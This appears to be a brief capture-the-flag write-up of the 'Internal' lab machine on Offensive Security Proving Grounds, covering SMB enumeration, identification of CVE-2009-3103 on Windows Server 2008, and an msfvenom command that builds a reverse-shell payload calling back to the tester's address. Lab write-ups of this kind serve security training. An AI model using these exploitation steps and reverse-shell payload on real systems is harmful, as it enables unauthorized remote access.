Internal

Writeup for Internal from Offensive Security Proving Grounds (PG)

Information Gathering

Service Enumeration

nmapAutomator.sh -H 192.168.134.40 -t full

SMB

SMB is running and null sessions are allowed.

enum4linux 192.168.134.40

Nothing much interesting. Access denied for most queries.

From the scan results we can see the Windows version: Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds

That's pretty old. Let's run a vulnerability scan: nmapAutomator.sh -H 192.168.134.40 -t vulns

Vulnerability: CVE-2009-3103 (SMBv2 RCE)

Exploit code: https://www.exploit-db.com/exploits/40280

Exploit

Generate shellcode: msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.134 LPORT=4444 EXITFUNC=thread -f c

Add the shellcode output to the above exploit code.

Modified exploit code:

Use exploit/multi/handler to handle the staged payload (remember to set the corresponding PAYLOAD and THREAD from msfvenom earlier.)

Last updated

Was this helpful?